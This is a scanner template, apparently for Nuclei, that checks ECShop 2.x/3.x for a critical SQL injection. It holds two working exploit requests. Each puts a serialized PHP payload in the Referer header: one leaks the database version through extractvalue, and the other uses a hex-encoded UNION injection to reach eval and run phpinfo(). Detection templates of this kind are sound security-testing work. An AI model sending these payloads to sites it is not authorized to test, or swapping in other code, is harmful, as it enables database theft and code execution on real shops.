56 lines
2.3 KiB
YAML
56 lines
2.3 KiB
YAML
id: ecshop-sqli
|
|
|
|
info:
|
|
name: ECShop 2.x/3.x - SQL Injection
|
|
author: Lark-lab,ImNightmaree,ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
|
|
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
|
|
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
|
|
- https://www.shutingrz.com/post/ad_hack-ec_exploit/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="ECShop"
|
|
tags: sqli,php,ecshop
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /user.php?act=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
|
|
- |
|
|
GET /user.php?act=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'XPATH syntax error:'
|
|
- '[error] =>'
|
|
- '[0] => Array'
|
|
- 'MySQL server error report:Array'
|
|
condition: and
|
|
|
|
- type: word
|
|
words:
|
|
- "PHP Extension"
|
|
- "PHP Version"
|
|
condition: and
|
|
|
|
# digest: 490a0046304402205603261eadaae4dcead3ac6958deb41a24aecb61579b6dc4076cec16e6f98af90220431258efa9d9af670dabc223b8eb71a0c8f124737fdcdea42e98c1a07293586f:922c64590222798bb761d5b6d8e72950
|